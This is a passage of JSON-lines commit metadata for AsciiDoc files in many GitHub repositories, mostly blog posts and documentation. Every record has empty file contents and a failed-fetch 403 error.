Headset)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-17-ASTRO-Gaming-A50-Wireless-Headset-Unboxing-PS3-Xbox-360-PC-Gaming-Headset.adoc","new_file":"_posts\/2012-12-17-ASTRO-Gaming-A50-Wireless-Headset-Unboxing-PS3-Xbox-360-PC-Gaming-Headset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b7373c456e1ba918b401e4dfaac75b0dffa78ff","subject":"Update 2015-11-29-This-is-a-post.adoc","message":"Update 2015-11-29-This-is-a-post.adoc","repos":"BenBals\/hubpress,BenBals\/hubpress,BenBals\/hubpress","old_file":"_posts\/2015-11-29-This-is-a-post.adoc","new_file":"_posts\/2015-11-29-This-is-a-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BenBals\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b758c00771978a1a49ab4adfa999177a61a2b723","subject":"Renamed '_posts\/2017-10-18-Blog-Title.adoc' to '_posts\/2017-10-18-Hello-World.adoc'","message":"Renamed '_posts\/2017-10-18-Blog-Title.adoc' to '_posts\/2017-10-18-Hello-World.adoc'","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-18-Hello-World.adoc","new_file":"_posts\/2017-10-18-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb5ab1f4be3c3b587f6b689637b683b08e8ac327","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8d44ad985fd2cf420d598409e919abd2e611be4","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f96c405801dfd5f8ebd2c60d01564459d245f899","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 
2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5ce9cf92c8bea14bdcb462b7c119638ff2fa8b5","subject":"odoo-addons\/sirail#3168 ajout documentation","message":"odoo-addons\/sirail#3168 ajout documentation\n","repos":"ndp-systemes\/odoo-addons,ndp-systemes\/odoo-addons,ndp-systemes\/odoo-addons","old_file":"ndp_migration\/documentation.adoc","new_file":"ndp_migration\/documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ndp-systemes\/odoo-addons.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"6b662135b736ca7fe48582f87d8a5555ac8e17fe","subject":"Adding index file for the tutorial in the docsite","message":"Adding index file for the tutorial in the docsite\n","repos":"platosha\/angular-polymer,vaadin\/angular2-polymer,vaadin\/angular2-polymer,platosha\/angular-polymer,platosha\/angular-polymer","old_file":"docs\/tutorial-index.adoc","new_file":"docs\/tutorial-index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/angular2-polymer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec77563222b7812a09d0f2e5ec00a7328e763c16","subject":"Added Forge 2.12.3.Final announcement","message":"Added Forge 2.12.3.Final announcement\n","repos":"forge\/docs,forge\/docs,luiz158\/docs,addonis1990\/docs,agoncal\/docs,agoncal\/docs,luiz158\/docs,addonis1990\/docs","old_file":"news\/2014-12-01-forge-2.12.3.final.asciidoc","new_file":"news\/2014-12-01-forge-2.12.3.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9a63da84308937684086a03f37005797a2b54b90","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/08\/20\/deref.adoc","new_file":"content\/news\/2021\/08\/20\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8d7b179b69801d762d793293f1587b88027481e0","subject":"Add clustering docs","message":"Add clustering docs\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/clustering.asciidoc","new_file":"doc\/src\/main\/docs\/clustering.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"f10790fd9c06587e1ee9264f8c69853ec488ae54","subject":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","message":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4cc1767f4a84a07f59ee53557e37d1b7fdf3f38","subject":"Update 2018-12-10-Im-Wahnsinn-der-Bibliothek.adoc","message":"Update 2018-12-10-Im-Wahnsinn-der-Bibliothek.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2018-12-10-Im-Wahnsinn-der-Bibliothek.adoc","new_file":"_posts\/2018-12-10-Im-Wahnsinn-der-Bibliothek.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aafd4e466425701e48ffa991011cc910535d17aa","subject":"Renamed '_posts\/2017-10-15-Find-your-HOME.adoc' to '_posts\/2019-01-31-Find-your-HOME.adoc'","message":"Renamed '_posts\/2017-10-15-Find-your-HOME.adoc' to '_posts\/2019-01-31-Find-your-HOME.adoc'","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2019-01-31-Find-your-HOME.adoc","new_file":"_posts\/2019-01-31-Find-your-HOME.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb4965f07045f0daea9ec620e89f6b74ad4f831f","subject":"Update 2016-07-29-My-Zimbabwean-Queen.adoc","message":"Update 2016-07-29-My-Zimbabwean-Queen.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-07-29-My-Zimbabwean-Queen.adoc","new_file":"_posts\/2016-07-29-My-Zimbabwean-Queen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f347a44c7232f964947f6b838d28267b64b385c0","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a52c4bd451a7e04121898ae56648378e8b674ca","subject":"edits in blog Hazelcast for Mongo","message":"edits in blog Hazelcast for Mongo\n","repos":"gAmUssA\/hazelcast-mongo-experiments","old_file":"Hazelcast For MongoDB users.adoc","new_file":"Hazelcast For MongoDB 
users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gAmUssA\/hazelcast-mongo-experiments.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94ff6648cc93b45ef5b5780e7323dc1393bdace","subject":"new post: colours in django model","message":"new post: colours in django model\n","repos":"daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io","old_file":"_posts\/2017-11-08-Colous-in-Django-Model.adoc","new_file":"_posts\/2017-11-08-Colous-in-Django-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/daemotron\/daemotron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"867f29eaa197e0df2522046cd69e83c661026737","subject":"Update 2015-05-20-Post-test.adoc","message":"Update 2015-05-20-Post-test.adoc","repos":"jankolorenc\/jankolorenc.github.io,jankolorenc\/jankolorenc.github.io,jankolorenc\/jankolorenc.github.io","old_file":"_posts\/2015-05-20-Post-test.adoc","new_file":"_posts\/2015-05-20-Post-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jankolorenc\/jankolorenc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c0a1e5ad07f39259c6ed8498c3a71d8e5a883bf","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"025e9b0fd546cd942064d5e1889624f2698c6f04","subject":"Fix documentation","message":"Fix documentation\n","repos":"qarea\/jirams,qarea\/planningms,qarea\/planningms,qarea\/jirams","old_file":"doc\/narada-tgms-base.adoc","new_file":"doc\/narada-tgms-base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qarea\/jirams.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c0b776d76d26b8deb81a9e04a651e9e2e9bf9e6","subject":"Grant db user osis the right to create db","message":"Grant db user osis the right to create db\n\nIt is necessary to execute the tests.","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b353741a39a1b0806269eb3a6e540b104c69f408","subject":"Update 2015-06-13-Nachalo.adoc","message":"Update 
2015-06-13-Nachalo.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2015-06-13-Nachalo.adoc","new_file":"_posts\/2015-06-13-Nachalo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c486526c648235ce2c8238e04c6b5a6a729b3fec","subject":"Delete 2015-08-06-TO-DELE.adoc","message":"Delete 2015-08-06-TO-DELE.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-TO-DELE.adoc","new_file":"_posts\/2015-08-06-TO-DELE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b7fa5c0f5973d05ae74b56cf0bea38bc4dd5473","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73bd67d19d5805e3e05e3fc821b9bab4a77e88b7","subject":"Update 2018-05-15-signals.adoc","message":"Update 2018-05-15-signals.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-05-15-signals.adoc","new_file":"_posts\/2018-05-15-signals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3257487c6d047bc1ecca4bfdf78167e00e9d00f4","subject":"Don't bold","message":"Don't bold\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"dc43227cd8a8260783fafd593ae2d7095d6bf4ba","subject":"Add bitwise operations","message":"Add bitwise operations\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5f214b2030dcb3baf1a610f273ae573b5692c40c","subject":"CL: build executable with xach's buildapp","message":"CL: build executable with xach's buildapp\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 
403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1b30c601aaac56f0393178a9799bd377fc8e33bc","subject":"[doc] updated release notes for Kudu C++ client","message":"[doc] updated release notes for Kudu C++ client\n\nChange-Id: If4667dc7bb90fdf910c06a9107ce41f1ac3d7037\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5006\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b0dfeefdcbb40c895d2a5ee3c0e681a2f9f924b","subject":"add coc","message":"add coc\n\nSigned-off-by: Sebastian Ho\u00df <1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>","repos":"sebhoss\/memoization.java","old_file":"CODE_OF_CONDUCT.asciidoc","new_file":"CODE_OF_CONDUCT.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebhoss\/memoization.java.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"fa2b0ed7d9476302f0f33efd045225c9cab06f63","subject":"Update 2015-08-09-Hola-Mundo.adoc","message":"Update 2015-08-09-Hola-Mundo.adoc","repos":"Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,Rackcore\/Rackcore.github.io,AlonsoCampos\/AlonsoCampos.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-08-09-Hola-Mundo.adoc","new_file":"_posts\/2015-08-09-Hola-Mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"2154e92a8460145c8678816c78e1eb4d66468912","subject":".tavis.yml\u3092\u30b3\u30df\u30c3\u30c8\u3002","message":".tavis.yml\u3092\u30b3\u30df\u30c3\u30c8\u3002\n","repos":"TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TraningManagementSystem\/tms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f900000de22b790b16764f7441b0b7c0c99b67ec","subject":"Updated README","message":"Updated README\n","repos":"oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9cc02b997ec7fb428e2967cab819e74d9ed1e762","subject":"Added section for Tomcat","message":"Added section for Tomcat\n","repos":"waratek\/spiracle,prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"766ee43750dcfc1136d981a68c769e22cceb3e54","subject":"Update README.adoc","message":"Update README.adoc\n\nAdd flattr 
button","repos":"plyom\/hubpress.io,gsha0\/hubpress.io,binout\/javaonemorething,dsuryakusuma\/dsuryakusuma.github.io,errorval\/blog,fghhfg\/hubpress.io,Nepal-Blockchain\/danphe-blogs,PerthHackers\/blog,ml4den\/hubpress,isaacriquelme\/endata.do,crotel\/meditation,codetricity\/journey,nandansaha\/AroundTheWeb,philippevidal80\/blog,sebprev\/blog,binout\/javaonemorething,sebarid\/pages,dsuryakusuma\/dsuryakusuma.github.io,Port666\/hubpress.io,OdieD8\/hubpress.io,jamarortiz\/pragmaticalware,tmdgus0118\/blog.code404.co.kr,ottoandry\/ottoandry1,wzzrd\/hubpress.io,rorosaurus\/hubpress.io,fwalloe\/infosecbriefly,ErJ101\/hbspractise,nicolaschaillot\/pechdencouty,ambarishpande\/blog,thaibeouu\/blog,alexknowshtml\/thebigmove,sanctumware\/hubpress,ambarishpande\/blog,qingyuqy\/qingyuqy.io,matthardwick\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,OdieD8\/hubpress.io,jerometambo\/blog,isaacriquelme\/endata.do,abesn\/hubpress.io,hiun\/hubpress.io,BenBals\/hubpress,OlympusOnline2\/announcements,fghhfg\/hubpress.io,bemug\/devblog,ReadyP1\/hubpress.io,rynop\/rynop.hubpress.io,vuthaihoc\/vuthaihoc.github.io,loetjoe\/blog,entropyz\/blog,SockPastaRock\/hubpress.io,rynop\/rynop.hubpress.io,topluluk\/blog,kornel661\/blog-test-jm,rubyinhell\/hubpress.io,jcsirot\/hubpress.io,ErJ101\/hbspractise,sillyleo\/bible.notes,adest\/press,ottoandry\/ottoandry1,ruaqiwei23\/blog,andreassiegelrfid\/hubpress.io,heartnn\/hubpress.io,mcornell\/OFM,BenBals\/hubpress,SockPastaRock\/hubpress.io,sharmivssharmi\/sharmipress,mcornell\/OFM,sebarid\/pages,pdudits\/pdudits.github.io,simonturesson\/hubpresstestsimon,paolo215\/blog,devananda\/devananda.github.io,sharmivssharmi\/sharmipress,mrtrombley\/blog,magivfer\/pages,lawrencetaylor\/hubpress.io,sebprev\/blog,Perthmastersswimming\/hubpress.io,trycrmr\/hubpress.io,melix\/hubpress,discimport\/blog.discimport.dk,ditirambo\/ditirambo.es,JohanBrunet\/hubpress.io,chackomathew\/blog,PerthHackers\/blog,DavidTPate\/davidtpate.com,mcornell\/OFM,gogonkt\/makenothing,crotel\/studio,cmhgroupllc\/blog,simpleHoChun\/blog,alexhanschke\/hubpress.io,Jekin6\/blog,jlcurty\/jlcurty.github.io-,tom-konda\/blog,atomfrede\/shiny-adventure,apoch\/blog,joshuarrrr\/hubpress.io,manelvf\/blog,christofmarti\/blog,PerthHackers\/blog,eimajenthat\/hubpress.io,jcsirot\/hubpress.io,nicksam112\/nicksam112.github.io,Astrokoala-Studio\/hubpress.io,Abdul2\/abdul2.github.io,hang-h\/hubpress.io,hva314\/blog,akhmetgali\/hubpress.io,DaOesten\/hubpress.io,Abdul2\/abdul2.github.io,sillyleo\/bible.notes,jabbytechnologies\/blog,Nepal-Blockchain\/danphe-blogs,berryzed\/tech-blog,eimajenthat\/hubpress.io,rorosaurus\/hubpress.io,nicksam112\/nicksam112.github.io,entropyz\/blog,ciena-blueplanet\/developers.blog,csiebler\/hubpress-test,mairandomness\/randomblog,loetjoe\/blog,errorval\/blog,baocongchen\/blogs,qingyuqy\/qingyuqy.io,yelangya3826850\/monaenhubpress,anandjagadeesh\/blog,ashalkhakov\/hubpress.io,topicusonderwijs\/topicusonderwijs.github.io,gilangdanu\/blog,manelvf\/blog,demiansan\/demiansan.github.io,danen-carlson\/blog,crotel\/studio,sebarid\/pages,crobby\/hubpress.io,sakkemo\/blog,sakkemo\/blog,alexhanschke\/hubpress.io,mrtrombley\/blog,sanctumware\/hubpress,harichen\/harichen.io,benignbala\/benignbala.hubpress.io,anshu92\/blog,rorohiko21\/blog,gilangdanu\/blog,atomfrede\/shiny-adventure,sakkemo\/blog,julianrichen\/blog,hang-h\/hubpress.io,elinep\/blog,nicolaschaillot\/pechdencouty,Bloggerschmidt\/bloggerschmidt.de,dmacstack\/glob,pramodjg\/articles,xinmeng1\/note,igovsol\/blog,RussellSnyder\/hubpress-test,yelangya3
826850\/monaenhubpress,cmolitor\/blog,joshuarrrr\/hubpress.io,aspick\/hubpress.io,ml4den\/hubpress,ice09\/ice09ng,lrabiet\/patisserie,sxgc\/blog,mufarooqq\/blog,andreassiegelrfid\/hubpress.io,pascalgrimaud\/hubpress.io,pdudits\/pdudits.github.io,dsuryakusuma\/dsuryakusuma.github.io,aspick\/hubpress.io,philippevidal80\/blog,thesagarsutar\/hubpress,marksubbarao\/hubpress.io,clear-project\/blog,dmacstack\/glob,sanctumware\/hubpress,msavy\/rhymewithgravy.com,gsha0\/hubpress.io,jlmcgehee21\/nooganeer,tehbilly\/blog,trycrmr\/hubpress.io,setupminimal\/blog,anandjagadeesh\/blog,joescharf\/joescharf.github.io,yelangya3826850\/monaenhubpress,mufarooqq\/blog,fwalloe\/infosecbriefly,iKnowMagic\/hubpress.io,ditirambo\/ditirambo.es,josegomezr\/blog,dawn-chiniquy\/clear-project.org,Perthmastersswimming\/hubpress.io,erramuzpe\/gsoc2016,mcornell\/OFM,magivfer\/pages,simonturesson\/hubpresstestsimon,jjmean2\/server-study,sebprev\/blog,hva314\/blog,ReadyP1\/hubpress.io,Abdul2\/abdul2.github.io,melix\/hubpress,willcrisis\/www.willcrisis.com,tom-konda\/blog,lrabiet\/patisserie,codelab-lbernard\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,JohanBrunet\/hubpress.io,AirHacX\/blog.airhacx.com,OlympusOnline2\/announcements,crotel\/studio,seturne\/hubpress.io,roelvs\/hubpress.io,laibaogo\/hubpress.io,201507\/blog,Jason2013\/hubpress,shinnoki\/hubpress.io,fghhfg\/hubpress.io,porolakka\/hubpress.io,redrabbit-calligraphy\/redrabbit-calligraphy-blog,201507\/blog,thesagarsutar\/hubpress,cmolitor\/blog,iKnowMagic\/hubpress.io,jpcanovas\/myBlog,amberry\/blog,joshuarrrr\/hubpress.io,alexhanschke\/hubpress.io,mcrotty\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io,princeminz\/blog,julianrichen\/blog,whelamc\/life,harichen\/harichen.io,amberry\/blog,manelvf\/blog,setupminimal\/blog,gbougeard\/blog.english,rorohiko21\/blog,shinnoki\/hubpress.io,melix\/hubpress,aspick\/hubpress.io,mrtrombley\/blog,sharmivssharmi\/sharmipress,ruaqiwei23\/blog,adamperer\/diary,Bloggerschmidt\/bloggerschmidt.de,crotel\/meditation,Adyrhan\/adyrhan.github.io,kobusb\/blog,kornel661\/blog-test-jm,hutchr\/hutchr.github.io,apoch\/blog,nthline\/hubpress.io,jamarortiz\/pragmaticalware,mrtrombley\/blog,tmdgus0118\/blog.code404.co.kr,willcrisis\/www.willcrisis.com,Adyrhan\/adyrhan.github.io,aspick\/h